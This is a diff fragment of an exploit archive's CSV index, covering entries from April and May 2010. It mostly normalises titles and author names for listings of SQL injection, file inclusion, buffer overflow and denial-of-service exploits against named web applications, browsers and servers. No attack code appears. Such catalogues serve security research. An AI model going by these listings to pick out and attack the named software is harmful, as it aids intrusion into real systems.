Vulnerability",2010-04-30,Sid3^effects,php,webapps,0 +12463,platforms/php/webapps/12463.txt,"New-CMS - Multiple Vulnerability",2010-04-30,"Dr. Alberto Fontanella",php,webapps,0 +12464,platforms/asp/webapps/12464.txt,"ASPCode CMS <= 1.5.8 - Multiple Vulnerabilities",2010-04-30,"Dr. Alberto Fontanella",asp,webapps,0 12465,platforms/php/webapps/12465.txt,"Joomla Component com_newsfeeds SQL injection vulnerability",2010-04-30,Archimonde,php,webapps,0 -12466,platforms/php/webapps/12466.txt,"Puntal v2.1.0 Remote File Inclusion Vulnerability",2010-04-30,eidelweiss,php,webapps,0 -12467,platforms/php/webapps/12467.txt,"Webthaiapp detail.php(cat) Blind Sql injection Vulnerability",2010-04-30,Xelenonz,php,webapps,0 +12466,platforms/php/webapps/12466.txt,"Puntal 2.1.0 - Remote File Inclusion Vulnerability",2010-04-30,eidelweiss,php,webapps,0 +12467,platforms/php/webapps/12467.txt,"Webthaiapp detail.php(cat) Blind Sql injection Vulnerability",2010-04-30,Xelenonz,php,webapps,0 12468,platforms/php/webapps/12468.txt,"Alibaba Clone Platinum (offers_buy.php) SQL Injection Vulnerability",2010-04-30,v3n0m,php,webapps,0 12469,platforms/windows/local/12469.rb,"Urgent Backup 3.20 / ABC Backup Pro 5.20 / ABC Backup 5.50 (.zip) SEH",2010-04-30,Lincoln,windows,local,0 12471,platforms/asp/webapps/12471.txt,"Comersus 8 Shopping Cart SQL Injection and CSRF Vulnerability",2010-05-01,Sid3^effects,asp,webapps,0 -12472,platforms/php/webapps/12472.txt,"CF Image Host v1.1 Remote File Inclusion Vulnerability",2010-05-01,The.Morpheus,php,webapps,0 +12472,platforms/php/webapps/12472.txt,"CF Image Host 1.1 - Remote File Inclusion Vulnerability",2010-05-01,The.Morpheus,php,webapps,0 12473,platforms/php/webapps/12473.txt,"Joomla Component Table JX XSS Vulnerabilities",2010-05-01,Valentin,php,webapps,0 12474,platforms/php/webapps/12474.txt,"Joomla Component Card View JX XSS Vulnerabilities",2010-05-01,Valentin,php,webapps,0 12475,platforms/php/webapps/12475.txt,"Opencatalogue 1.024 Local File Include Vulnerability",2010-05-01,cr4wl3r,php,webapps,0 12476,platforms/php/webapps/12476.txt,"Opencimetiere 2.01 Multiple Remote File Include Vulnerability",2010-05-01,cr4wl3r,php,webapps,0 12477,platforms/windows/dos/12477.txt,"Google Chrome 4.1.249.1064 Remote Memory Corrupt",2010-05-01,eidelweiss,windows,dos,0 -12478,platforms/asp/webapps/12478.txt,"Mesut Man₫et Haber V1.0 Auth Bypass Vulnerability",2010-05-02,LionTurk,asp,webapps,0 +12478,platforms/asp/webapps/12478.txt,"Mesut Man₫et Haber 1.0 - Auth Bypass Vulnerability",2010-05-02,LionTurk,asp,webapps,0 12479,platforms/php/webapps/12479.txt,"Joomla DJ-Classifieds Extension com_djclassifieds Upload Vulnerability",2010-05-02,Sid3^effects,php,webapps,0 -12480,platforms/windows/remote/12480.txt,"Acritum Femitter Server v1.03 Multiple Vulnerabilities",2010-05-02,"Zer0 Thunder",windows,remote,0 +12480,platforms/windows/remote/12480.txt,"Acritum Femitter Server 1.03 - Multiple Vulnerabilities",2010-05-02,"Zer0 Thunder",windows,remote,0 12481,platforms/php/webapps/12481.txt,"WHMCS Control 2 (announcements.php) SQL Injection",2010-05-02,"Islam DefenDers",php,webapps,0 12482,platforms/windows/dos/12482.py,"TFTPGUI Long Transport Mode Overflow",2010-05-02,"Jeremiah Talamantes",windows,dos,0 -12484,platforms/php/webapps/12484.txt,"GuppY v4.5.18 Blind SQL/XPath injection Vulnerability",2010-05-02,indoushka,php,webapps,0 -12485,platforms/php/webapps/12485.txt,"Burning Board Lite 1.0.2 Shell Upload Vulnerability",2010-05-02,indoushka,php,webapps,0 +12484,platforms/php/webapps/12484.txt,"GuppY 4.5.18 - Blind SQL/XPath Injection Vulnerability",2010-05-02,"indoushka salah el ddine",php,webapps,0 +12485,platforms/php/webapps/12485.txt,"Burning Board Lite 1.0.2 Shell Upload Vulnerability",2010-05-02,"indoushka salah el ddine",php,webapps,0 12486,platforms/php/webapps/12486.txt,"Openannuaire Openmairie Annuaire 2.00 (RFI/LFI) Multiple File Include Vulnerability",2010-05-02,cr4wl3r,php,webapps,0 12487,platforms/windows/dos/12487.html,"JavaScriptCore.dll Stack Exhaustion",2010-05-03,"Mathias Karlsson",windows,dos,0 12488,platforms/php/webapps/12488.txt,"Gallo 0.1.0 Remote File Include Vulnerability",2010-05-03,cr4wl3r,php,webapps,0 @@ -11389,11 +11389,11 @@ id,file,description,date,author,platform,type,port 12491,platforms/multiple/dos/12491.html,"All browsers 0day Crash Exploit",2010-05-03,"Inj3ct0r Team",multiple,dos,0 12492,platforms/windows/dos/12492.html,"Firefox 3.6.3 Fork Bomb DoS",2010-05-03,Dr_IDE,windows,dos,0 12493,platforms/multiple/dos/12493.html,"All Browsers - Long Unicode DoS PoC",2010-05-03,Dr_IDE,multiple,dos,0 -12494,platforms/windows/dos/12494.pl,"Winamp v5.572 0day Local Crash PoC",2010-05-03,R3d-D3v!L,windows,dos,0 +12494,platforms/windows/dos/12494.pl,"Winamp 5.572 - Local Crash PoC (0day)",2010-05-03,R3d-D3v!L,windows,dos,0 12495,platforms/windows/remote/12495.pl,"ProSSHD 1.2 remote post-auth exploit (w/ASLR and DEP bypass)",2010-05-03,"Alexey Sintsov",windows,remote,0 -12496,platforms/php/webapps/12496.html,"KubeBlog XSRF",2010-05-03,The.Morpheus,php,webapps,0 +12496,platforms/php/webapps/12496.html,"KubeBlog CSRF",2010-05-03,The.Morpheus,php,webapps,0 12497,platforms/windows/local/12497.c,"PhotoFiltre Studio X .tif file local buffer overflow poc (0day)",2010-05-04,"fl0 fl0w",windows,local,0 -12498,platforms/windows/remote/12498.txt,"VicFTPS v5.0 Directory Traversal",2010-05-04,chr1x,windows,remote,0 +12498,platforms/windows/remote/12498.txt,"VicFTPS 5.0 - Directory Traversal",2010-05-04,chr1x,windows,remote,0 12499,platforms/php/webapps/12499.txt,"DBHcms 1.1.4 Stored XSS",2010-05-04,ITSecTeam,php,webapps,0 12500,platforms/php/webapps/12500.txt,"Clicksor SQL Injecti0n Vulnerability",2010-05-04,JM511,php,webapps,0 12501,platforms/windows/local/12501.php,"Beyond Compare 3.0.13 b9599 (.zip) 0day Stack Buffer Overflow PoC Exploit",2010-05-04,mr_me,windows,local,0 @@ -11402,10 +11402,10 @@ id,file,description,date,author,platform,type,port 12507,platforms/php/webapps/12507.txt,"SmartCMS v.2 SQL Injection Vulnerability",2010-05-04,Ariko-Security,php,webapps,0 12508,platforms/osx/dos/12508.html,"history.go() DoS on multiple browsers",2010-05-04,Dr_IDE,osx,dos,0 12509,platforms/osx/dos/12509.html,"window.print() DoS on multiple browsers",2010-05-04,Dr_IDE,osx,dos,0 -12510,platforms/php/webapps/12510.php,"Wormable Remote Code Execution in PHP-Nuke 7.0/8.1/8.1.35",2010-05-05,"Michael Brooks",php,webapps,0 -12511,platforms/windows/remote/12511.txt,"MDaemon Mailer Daemon Version 11.0.1 (LATEST) Remote File Disclosure",2010-05-05,Kingcope,windows,remote,0 +12510,platforms/php/webapps/12510.php,"PHP-Nuke 7.0/8.1/8.1.35 - Wormable Remote Code Execution",2010-05-05,"Michael Brooks",php,webapps,0 +12511,platforms/windows/remote/12511.txt,"MDaemon Mailer Daemon 11.0.1 - Remote File Disclosure",2010-05-05,Kingcope,windows,remote,0 12512,platforms/windows/remote/12512.py,"Ziepod+ 1.0 Cross Application Scripting",2010-05-05,sinn3r,windows,remote,0 -12514,platforms/php/webapps/12514.txt,"PHP-NUKE v5.0 viewslink Remote SQL Injection",2010-05-05,CMD,php,webapps,0 +12514,platforms/php/webapps/12514.txt,"PHP-NUKE 5.0 - Viewslink Remote SQL Injection",2010-05-05,CMD,php,webapps,0 12515,platforms/php/webapps/12515.txt,"Slooze PHP Web Photo Album v0.2.7 Command Execution Vulnerability",2010-05-05,"Sn!pEr.S!Te hacker",php,webapps,0 12516,platforms/windows/local/12516.py,"BaoFeng Storm M3U File Processing Buffer Overflow Exploit",2010-05-06,"Lufeng Li and Qingshan Li",windows,local,0 12517,platforms/php/webapps/12517.txt,"GetSimple 2.01 LFI",2010-05-06,Batch,php,webapps,0 @@ -11421,14 +11421,14 @@ id,file,description,date,author,platform,type,port 12527,platforms/asp/webapps/12527.txt,"Administrador de Contenidos Admin Login Bypass vulnerability",2010-05-07,Ra3cH,asp,webapps,0 12528,platforms/windows/local/12528.pl,"AVCON H323Call Buffer Overflow",2010-05-07,"Dillon Beresford ",windows,local,0 12529,platforms/windows/dos/12529.py,"ESET Smart Security 4.2 and NOD32 Antivirus 4.2 (x32-x64) LZH archive parsing PoC Exploit",2010-05-07,"Oleksiuk Dmitry, eSage Lab",windows,dos,0 -12530,platforms/windows/dos/12530.rb,"TFTPGUI v1.4.5 Long Transport Mode Overflow DoS (Meta)",2010-05-08,"Jeremiah Talamantes",windows,dos,0 +12530,platforms/windows/dos/12530.rb,"TFTPGUI 1.4.5 - Long Transport Mode Overflow DoS (Meta)",2010-05-08,"Jeremiah Talamantes",windows,dos,0 12531,platforms/windows/dos/12531.pl,"GeoHttpServer Remote DoS Vulnerability",2010-05-08,aviho1,windows,dos,0 12532,platforms/php/webapps/12532.txt,"B2B Classic Trading Script (offers.php) SQL Injection Vulnerability",2010-05-08,v3n0m,php,webapps,0 12533,platforms/php/webapps/12533.txt,"(big.asp) SQL Injection Vulnerability",2010-05-08,Ra3cH,php,webapps,0 -12534,platforms/php/webapps/12534.txt,"PHP Link Manager Version 1.7 Url Redirection Bug",2010-05-08,ITSecTeam,php,webapps,0 +12534,platforms/php/webapps/12534.txt,"PHP Link Manager 1.7 - Url Redirection Bug",2010-05-08,ItSecTeam,php,webapps,0 12535,platforms/php/webapps/12535.txt,"phpscripte24 Countdown Standart Rückwärts Auktions System SQL Injection",2010-05-08,"Easy Laster",php,webapps,0 12539,platforms/php/webapps/12539.txt,"Joomla Component com_articleman Upload Vulnerability",2010-05-08,Sid3^effects,php,webapps,0 -12540,platforms/windows/local/12540.rb,"IDEAL Migration v4.5.1 Buffer Overflow Exploit (Meta)",2010-05-08,Blake,windows,local,0 +12540,platforms/windows/local/12540.rb,"IDEAL Migration 4.5.1 - Buffer Overflow Exploit (Meta)",2010-05-08,Blake,windows,local,0 12541,platforms/windows/dos/12541.php,"Dolphin 2.0 (.elf) Local Daniel Of Service",2010-05-09,"Yakir Wizman",windows,dos,0 12542,platforms/php/webapps/12542.rb,"phpscripte24 Shop System SQL Injection Vulnerability Exploit",2010-05-09,"Easy Laster",php,webapps,0 12543,platforms/php/webapps/12543.rb,"Alibaba Clone Version <= 3.0 (Special) SQL Injection Vulnerability Exploit",2010-05-09,"Easy Laster",php,webapps,0 @@ -11436,7 +11436,7 @@ id,file,description,date,author,platform,type,port 12545,platforms/php/webapps/12545.rb,"phpscripte24 Live Shopping Multi Portal System SQL Injection Vulnerability Exploit",2010-05-09,"Easy Laster",php,webapps,0 12546,platforms/windows/dos/12546.pl,"Hyplay 1.2.326.1 (.asx) Local DoS crash PoC",2010-05-10,"Steve James",windows,dos,0 12547,platforms/php/webapps/12547.txt,"e-webtech (new.asp?id=) SQL Injection Vulnerability",2010-05-10,protocol,php,webapps,0 -12550,platforms/php/webapps/12550.pl,"Netvidade engine v1.0 Multiple Vulnerabilities",2010-05-10,pwndomina,php,webapps,0 +12550,platforms/php/webapps/12550.pl,"Netvidade engine 1.0 - Multiple Vulnerabilities",2010-05-10,pwndomina,php,webapps,0 12551,platforms/php/webapps/12551.txt,"Spaceacre Multiple SQL Injection Vulnerability",2010-05-10,Gendenk,php,webapps,0 12552,platforms/php/webapps/12552.txt,"tekno.Portal v 0.1b (makale.php id) SQL Injection Vulnerability",2010-05-10,CoBRa_21,php,webapps,0 12553,platforms/php/webapps/12553.txt,"Dark Hart Portal (login.php) Remote File Inclusion Vulnerability",2010-05-10,CoBRa_21,php,webapps,0 @@ -11445,17 +11445,17 @@ id,file,description,date,author,platform,type,port 12556,platforms/php/webapps/12556.txt,"Tadbir CMS (fckeditor) Remote Arbitrary File Upload Exploit Vulnerability",2010-05-10,"Pouya Daneshmand",php,webapps,0 12557,platforms/php/webapps/12557.txt,"Family Connections 2.2.3 Multiple Remote Vulnerabilities",2010-05-10,"Salvatore Fresta",php,webapps,0 12558,platforms/php/webapps/12558.txt,"29o3 CMS (LibDir) Multiple RFI Vulnerability",2010-05-10,eidelweiss,php,webapps,0 -12560,platforms/php/webapps/12560.txt,"724CMS Enterprise Version 4.59 SQL Injection Vulnerability",2010-05-10,cyberlog,php,webapps,0 -12561,platforms/php/webapps/12561.txt,"PHPKB Knowledge Base Software v2 Multilanguage Support Multi SQL Injection Vulnerabilities",2010-05-10,R3d-D3v!L,php,webapps,0 +12560,platforms/php/webapps/12560.txt,"724CMS Enterprise 4.59 - SQL Injection Vulnerability",2010-05-10,Cyberlog,php,webapps,0 +12561,platforms/php/webapps/12561.txt,"PHPKB Knowledge Base Software 2.0 - Multilanguage Support Multi SQL Injection Vulnerabilities",2010-05-10,R3d-D3v!L,php,webapps,0 12562,platforms/php/webapps/12562.txt,"Waibrasil Remote / Local File Inclusion",2010-05-10,eXeSoul,php,webapps,0 12563,platforms/php/webapps/12563.txt,"Fiomental & Coolsis Backoffice Multi Vulnerability",2010-05-10,MasterGipy,php,webapps,0 12564,platforms/windows/dos/12564.txt,"Microsoft Windows Outlook Express and Windows Mail Integer Overflow",2010-05-11,"Francis Provencher",windows,dos,0 -12565,platforms/php/webapps/12565.txt,"724CMS Enterprise Version 4.59 (section.php) LFI Vulnerability",2010-05-11,CoBRa_21,php,webapps,0 -12566,platforms/php/webapps/12566.txt,"724CMS Enterprise Version 4.59 (section.php) SQL Injection Vulnerability",2010-05-11,CoBRa_21,php,webapps,0 -12567,platforms/php/webapps/12567.html,"Aqar Script V.1 Remote By pass Exploit",2010-05-11,indoushka,php,webapps,0 -12568,platforms/php/webapps/12568.txt,"Digital College 1.0 Upload Vulnerability",2010-05-11,indoushka,php,webapps,0 -12569,platforms/php/webapps/12569.html,"Fast Free Media v1.3 Adult Site Upload Shell Exploit",2010-05-11,indoushka,php,webapps,0 -12570,platforms/php/webapps/12570.txt,"Uploader v0.1.5 Multiple Vulnerabilities",2010-05-11,indoushka,php,webapps,0 +12565,platforms/php/webapps/12565.txt,"724CMS Enterprise 4.59 - (section.php) LFI Vulnerability",2010-05-11,CoBRa_21,php,webapps,0 +12566,platforms/php/webapps/12566.txt,"724CMS Enterprise 4.59 - (section.php) SQL Injection Vulnerability",2010-05-11,CoBRa_21,php,webapps,0 +12567,platforms/php/webapps/12567.html,"Aqar Script V.1 Remote By pass Exploit",2010-05-11,"indoushka salah el ddine",php,webapps,0 +12568,platforms/php/webapps/12568.txt,"Digital College 1.0 Upload Vulnerability",2010-05-11,"indoushka salah el ddine",php,webapps,0 +12569,platforms/php/webapps/12569.html,"Fast Free Media 1.3 - Adult Site Upload Shell Exploit",2010-05-11,"indoushka salah el ddine",php,webapps,0 +12570,platforms/php/webapps/12570.txt,"Uploader v0.1.5 Multiple Vulnerabilities",2010-05-11,"indoushka salah el ddine",php,webapps,0 12571,platforms/asp/webapps/12571.txt,"e-webtech (page.asp) SQL Injection Vulnerability",2010-05-11,CoBRa_21,asp,webapps,0 12572,platforms/php/webapps/12572.txt,"Free Advertisment cms (user_info.php) SQL Injection Vulnerability",2010-05-11,XroGuE,php,webapps,0 12573,platforms/windows/remote/12573.html,"Apple Safari 4.0.5 parent.close() (memory corruption) 0day Code Execution Exploit",2010-05-11,"Krystian Kloskowski",windows,remote,0 @@ -11470,13 +11470,13 @@ id,file,description,date,author,platform,type,port 12582,platforms/windows/remote/12582.txt,"zervit Web Server v0.4 Directory Traversals",2010-05-12,Dr_IDE,windows,remote,0 12583,platforms/php/webapps/12583.txt,"e-webtech (fixed_page.asp) SQL Injection Vulnerability",2010-05-12,Fl0riX,php,webapps,0 12584,platforms/php/webapps/12584.txt,"PolyPager 1.0rc10 (fckeditor) Remote Arbitrary File Upload Vulnerability",2010-05-12,eidelweiss,php,webapps,0 -12585,platforms/php/webapps/12585.txt,"4images <= 1.7.7 (image_utils.php) Remote Command Execution Vulnerability",2010-05-12,"Sn!pEr.S!Te Hacker",php,webapps,0 +12585,platforms/php/webapps/12585.txt,"4images <= 1.7.7 (image_utils.php) Remote Command Execution Vulnerability",2010-05-12,"Sn!pEr.S!Te Hacker",php,webapps,0 12586,platforms/php/webapps/12586.php,"IPB 3.0.1 sql injection exploit",2010-05-13,Cryptovirus,php,webapps,0 12587,platforms/linux/remote/12587.c,"WFTPD Server 3.30 Multiple remote vulnerabilities(0day)",2010-05-13,"fl0 fl0w",linux,remote,21 12588,platforms/linux/dos/12588.txt,"Samba Multiple DoS Vulnerabilities",2010-05-13,"Laurent Gaffie",linux,dos,0 12590,platforms/php/webapps/12590.txt,"Joomla Component com_konsultasi (sid) SQL Injection Vulnerability",2010-05-13,c4uR,php,webapps,0 -12591,platforms/php/webapps/12591.txt,"BlaB! Lite <== 0.5 Remote File Inclusion Vulnerability",2010-05-13,"Sn!pEr.S!Te Hacker",php,webapps,0 -12592,platforms/php/webapps/12592.txt,"Joomla Component advertising (com_aardvertiser) V2.0 Local File Inclusion Vulnerability",2010-05-13,eidelweiss,php,webapps,0 +12591,platforms/php/webapps/12591.txt,"BlaB! Lite <= 0.5 - Remote File Inclusion Vulnerability",2010-05-13,"Sn!pEr.S!Te hacker",php,webapps,0 +12592,platforms/php/webapps/12592.txt,"Joomla Component advertising (com_aardvertiser) 2.0 - Local File Inclusion Vulnerability",2010-05-13,eidelweiss,php,webapps,0 12593,platforms/php/webapps/12593.txt,"damianov.net Shoutbox XSS Vulnerability",2010-05-13,"Valentin Hoebel",php,webapps,0 12594,platforms/php/webapps/12594.txt,"Joomla Component Seber Cart (getPic.php) Local File Disclosure Vulnerability",2010-05-13,AntiSecurity,php,webapps,0 12595,platforms/php/webapps/12595.txt,"Joomla Component FDione Form Wizard lfi vulnerability",2010-05-13,"Chip D3 Bi0s",php,webapps,0 @@ -11486,10 +11486,10 @@ id,file,description,date,author,platform,type,port 12599,platforms/php/webapps/12599.txt,"Heaven Soft CMS v 4.7 SQL Injection Vulnerability",2010-05-14,PrinceofHacking,php,webapps,0 12601,platforms/php/webapps/12601.txt,"Joomla Component JE Job Local File Inclusion Vulnerability",2010-05-14,Valentin,php,webapps,0 12602,platforms/windows/dos/12602.txt,"Firefox 3.6.3 & Safari 4.0.5 - Access Violation Exception and Unknown Exception",2010-05-14,"Fredrik Nordberg Almroth",windows,dos,0 -12603,platforms/windows/dos/12603.py,"SmallFTPD FTP Server v1.0.3 DELE Command DoS",2010-05-14,"Jeremiah Talamantes",windows,dos,0 -12604,platforms/windows/dos/12604.py,"TYPSoft FTP Server v1.10 RETR Command DoS",2010-05-14,"Jeremiah Talamantes",windows,dos,0 +12603,platforms/windows/dos/12603.py,"SmallFTPD FTP Server 1.0.3 - DELE Command DoS",2010-05-14,"Jeremiah Talamantes",windows,dos,0 +12604,platforms/windows/dos/12604.py,"TYPSoft FTP Server 1.10 - RETR Command DoS",2010-05-14,"Jeremiah Talamantes",windows,dos,0 12605,platforms/windows/dos/12605.html,"IncrediMail (ImShExtU.dll) ActiveX Memory Corruption",2010-05-14,Lincoln,windows,dos,0 -12606,platforms/asp/webapps/12606.txt,"SQL injection vulnerability in SelfComposer CMS",2010-05-14,Locu,asp,webapps,0 +12606,platforms/asp/webapps/12606.txt,"SelfComposer CMS- SQL injection vulnerability",2010-05-14,Locu,asp,webapps,0 12607,platforms/php/webapps/12607.txt,"Joomla Component com_jequoteform - Local File Inclusion",2010-05-14,altbta,php,webapps,0 12608,platforms/php/webapps/12608.txt,"Heaven Soft CMS v 4.7 (photogallery_open.php) SQL Injection Vulnerability",2010-05-14,CoBRa_21,php,webapps,0 12609,platforms/php/webapps/12609.txt,"Alibaba Clone Platinum (buyer/index.php) SQL Injection Vulnerability",2010-05-14,GuN,php,webapps,0 @@ -11499,13 +11499,13 @@ id,file,description,date,author,platform,type,port 12613,platforms/php/webapps/12613.txt,"CompactCMS 1.4.0 (tiny_mce) Remote File Upload",2010-05-15,ITSecTeam,php,webapps,0 12614,platforms/windows/remote/12614.txt,"Safari 4.0.5 parent.close() Memory Corruption exploit (w/ASLR and DEP bypass)",2010-05-15,"Alexey Sintsov",windows,remote,0 12615,platforms/php/webapps/12615.txt,"Joomla Component com_camp SQL Injection Vulnerability",2010-05-15,"Kernel Security Group",php,webapps,0 -12617,platforms/php/webapps/12617.txt,"File Thingie v2.5.5 File Security Bypass",2010-05-16,"Jeremiah Talamantes",php,webapps,0 +12617,platforms/php/webapps/12617.txt,"File Thingie 2.5.5 - File Security Bypass",2010-05-16,"Jeremiah Talamantes",php,webapps,0 12618,platforms/php/webapps/12618.txt,"Joomla Component simpledownload LFI Vulnerability",2010-05-16,Xr0b0t,php,webapps,0 12619,platforms/php/webapps/12619.txt,"Cybertek CMS Local File Include Vulnerability",2010-05-16,XroGuE,php,webapps,0 12620,platforms/php/webapps/12620.txt,"The iceberg 'Content Management System' SQL Injection Vulnerability",2010-05-16,cyberlog,php,webapps,0 -12621,platforms/windows/local/12621.pl,"Shellzip v3.0 Beta 3 (.zip) 0day Stack Buffer Overflow PoC exploit",2010-05-16,Sud0,windows,local,0 +12621,platforms/windows/local/12621.pl,"Shellzip 3.0 Beta 3 - (.zip) 0day Stack Buffer Overflow PoC exploit",2010-05-16,Sud0,windows,local,0 12623,platforms/php/webapps/12623.txt,"Joomla Component simpledownload Local File Disclosure",2010-05-16,altbta,php,webapps,0 -12624,platforms/php/webapps/12624.txt,"LinPHA <== 1.3.2 (rotate.php) Remote Command Execution Vulnerability",2010-05-16,"Sn!pEr.S!Te hacker",php,webapps,0 +12624,platforms/php/webapps/12624.txt,"LinPHA <= 1.3.2 - (rotate.php) Remote Command Execution Vulnerability",2010-05-16,"Sn!pEr.S!Te hacker",php,webapps,0 12628,platforms/php/webapps/12628.txt,"EgO v0.7b (fckeditor) Remote File Upload",2010-05-16,ITSecTeam,php,webapps,0 12629,platforms/php/webapps/12629.txt,"Tainos Multiple Vulnerabilities",2010-05-16,XroGuE,php,webapps,0 12630,platforms/php/webapps/12630.txt,"I-Vision CMS XSS, SQL injection vulnerability",2010-05-16,Ariko-Security,php,webapps,0 @@ -11513,12 +11513,12 @@ id,file,description,date,author,platform,type,port 12632,platforms/php/webapps/12632.txt,"Joomla Component com_crowdsource SQL Injection",2010-05-17,ByEge,php,webapps,0 12633,platforms/php/webapps/12633.txt,"Joomla Component com_event Multiple Vulnerabilities",2010-05-17,altbta,php,webapps,0 12634,platforms/php/webapps/12634.txt,"PHP Gamepage SQL Injection Vulnerability",2010-05-17,v4lc0m87,php,webapps,0 -12635,platforms/php/webapps/12635.txt,"PHP-Fusion v4.01 SQL Injection Vulnerability",2010-05-17,Ma3sTr0-Dz,php,webapps,0 +12635,platforms/php/webapps/12635.txt,"PHP-Fusion 4.01 - SQL Injection Vulnerability",2010-05-17,Ma3sTr0-Dz,php,webapps,0 12636,platforms/php/webapps/12636.txt,"MidiCart PHP,ASP Shell Upload Vulnerability",2010-05-17,DigitALL,php,webapps,0 -12637,platforms/php/webapps/12637.txt,"MyNews v1.0 CMS - Sql Injection, local file inclusion and XSS Vulnerabilities",2010-05-17,mr_me,php,webapps,0 +12637,platforms/php/webapps/12637.txt,"MyNews 1.0 CMS - SQL Injection, Local File Inclusion and XSS Vulnerabilities",2010-05-17,mr_me,php,webapps,0 12639,platforms/php/webapps/12639.txt,"Joomla Component com_event another sql injection vuln",2010-05-17,N/A,php,webapps,0 -12640,platforms/windows/webapps/12640.txt,"Abyss Web Server X1 XSRF",2010-05-17,"John Leitch",windows,webapps,0 -12641,platforms/php/webapps/12641.txt,"JE CMS version 1.1 SQL Injection Vulnerability",2010-05-17,AntiSecurity,php,webapps,0 +12640,platforms/windows/webapps/12640.txt,"Abyss Web Server X1 - CSRF",2010-05-17,"John Leitch",windows,webapps,0 +12641,platforms/php/webapps/12641.txt,"JE CMS 1.1 - SQL Injection Vulnerability",2010-05-17,AntiSecurity,php,webapps,0 12642,platforms/php/webapps/12642.txt,"phpMyAdmin 2.6.3-pl1 Cross Site Scripting and Full Path",2010-05-18,cp77fk4r,php,webapps,0 12643,platforms/php/webapps/12643.pl,"ChillyCMS Blind Sql Injection",2010-05-18,IHTeam,php,webapps,0 12644,platforms/php/webapps/12644.txt,"WebJaxe Sql Injection",2010-05-18,IHTeam,php,webapps,0 @@ -11530,33 +11530,33 @@ id,file,description,date,author,platform,type,port 12651,platforms/php/webapps/12651.txt,"Lokomedia CMS (sukaCMS) Local File Disclosure Vulnerability",2010-05-18,vir0e5,php,webapps,0 12652,platforms/netbsd_x86/dos/12652.sh,"NetBSD 5.0 and below Hack GENOCIDE Environment overflow proof of concept",2010-05-18,JMIT,netbsd_x86,dos,0 12653,platforms/netbsd_x86/dos/12653.sh,"NetBSD 5.0 and below Hack PATH Environment overflow proof of concept",2010-05-18,JMIT,netbsd_x86,dos,0 -12654,platforms/php/webapps/12654.txt,"DB[CMS] Sql Injection Vulnerability",2010-05-18,Pokeng,php,webapps,0 -12655,platforms/windows/dos/12655.txt,"QtWeb Browser version 3.3 Dos",2010-05-18,PoisonCode,windows,dos,0 +12654,platforms/php/webapps/12654.txt,"DB[CMS] Sql Injection Vulnerability",2010-05-18,Pokeng,php,webapps,0 +12655,platforms/windows/dos/12655.txt,"QtWeb Browser 3.3 - DoS",2010-05-18,PoisonCode,windows,dos,0 12656,platforms/php/webapps/12656.txt,"Battle Scrypt Shell Upload Vulnerability",2010-05-19,DigitALL,php,webapps,0 12657,platforms/windows/remote/12657.txt,"Google Chrome 4.1.249.1059 Cross Origin Bypass in Google URL (GURL)",2010-05-19,"Jordi Chancel",windows,remote,0 12658,platforms/freebsd/webapps/12658.txt,"Web Administration Broken Access Control in McAfee Email Gateway",2010-05-19,"Nahuel Grisolia",freebsd,webapps,0 12659,platforms/php/webapps/12659.txt,"DB[CMS] (section.php) SQL Injection Vulnerability",2010-05-19,CoBRa_21,php,webapps,0 12660,platforms/hardware/webapps/12660.txt,"Palo Alto Network Vulnerability - Cross-Site Scripting (XSS)",2010-05-19,"Jeromie Jackson",hardware,webapps,0 12661,platforms/php/webapps/12661.txt,"DBCart (article.php) SQL Injection Vulnerability",2010-05-19,v3n0m,php,webapps,0 -12662,platforms/windows/local/12662.rb,"SyncBack Freeware V3.2.20.0",2010-05-19,Lincoln,windows,local,0 +12662,platforms/windows/local/12662.rb,"SyncBack Freeware 3.2.20.0",2010-05-19,Lincoln,windows,local,0 12663,platforms/windows/remote/12663.html,"CommuniCrypt Mail 1.16 (ANSMTP.dll/AOSMTP.dll) ActiveX",2010-05-19,Lincoln,windows,remote,0 12664,platforms/asp/webapps/12664.txt,"Renista CMS BUG",2010-05-20,"Amir Afghanian",asp,webapps,0 12665,platforms/php/webapps/12665.pl,"IMEDIA (index.php) SQL Injection Vulnerability",2010-05-20,Kannibal615,php,webapps,0 12666,platforms/php/webapps/12666.txt,"DB[CMS] (article.php) SQL Injection Vulnerability",2010-05-20,blackraptor,php,webapps,0 12667,platforms/php/webapps/12667.py,"SQL Injection Entry Level Content Management System (EL CMS)",2010-05-20,"vir0e5 ",php,webapps,0 12671,platforms/php/webapps/12671.txt,"Powder Blue Design SQL Injection Vulnerability",2010-05-20,cyberlog,php,webapps,0 -12672,platforms/asp/webapps/12672.txt,"Spaw Editor v1.0 & 2.0 Remote File Upload",2010-05-20,Ma3sTr0-Dz,asp,webapps,0 +12672,platforms/asp/webapps/12672.txt,"Spaw Editor 1.0 & 2.0 - Remote File Upload",2010-05-20,Ma3sTr0-Dz,asp,webapps,0 12673,platforms/windows/remote/12673.txt,"ComponentOne VSFlexGrid v. 7 & 8 ""Archive()"" method Remote Buffer Overflow Exploit",2010-05-20,Ma3sTr0-Dz,windows,remote,0 -12674,platforms/php/webapps/12674.txt,"webYourPhotos <==6.05 (index.php) Remote File Inclusion Vulnerability",2010-05-20,"Sn!pEr.S!Te hacker",php,webapps,0 -12676,platforms/php/webapps/12676.txt,"GVI-2010-02 : Multiple vulnerabilities in Open-AudIT",2010-05-21,"Sébastien Duquette",php,webapps,0 -12677,platforms/windows/local/12677.html,"Rumba FTP Client FTPSFtp.dll v4.2.0.0 OpenSession() Buffer Overflow",2010-05-21,sinn3r,windows,local,0 +12674,platforms/php/webapps/12674.txt,"webYourPhotos <= 6.05 - (index.php) Remote File Inclusion Vulnerability",2010-05-20,"Sn!pEr.S!Te hacker",php,webapps,0 +12676,platforms/php/webapps/12676.txt,"Open-AudIT - Multiple vulnerabilities",2010-05-21,"Sébastien Duquette",php,webapps,0 +12677,platforms/windows/local/12677.html,"Rumba FTP Client FTPSFtp.dll 4.2.0.0 - OpenSession() Buffer Overflow",2010-05-21,sinn3r,windows,local,0 12679,platforms/windows/webapps/12679.txt,"3Com* iMC (Intelligent Management Center) Unauthenticated File Retrieval (traversal)",2010-05-21,"Richard Brain",windows,webapps,0 12680,platforms/windows/webapps/12680.txt,"3Com* iMC (Intelligent Management Center) Various XSS and Information Disclosure Flaws",2010-05-21,"Richard Brain",windows,webapps,0 12683,platforms/windows/dos/12683.pl,"Solarwinds 10.4.0.10 TFTP DOS",2010-05-21,Nullthreat,windows,dos,69 -12684,platforms/php/webapps/12684.txt,"ConPresso 4.0.7 SQL Injection Vulnerability",2010-05-21,Gamoscu,php,webapps,0 +12684,platforms/php/webapps/12684.txt,"ConPresso 4.0.7 SQL Injection Vulnerability",2010-05-21,Gamoscu,php,webapps,0 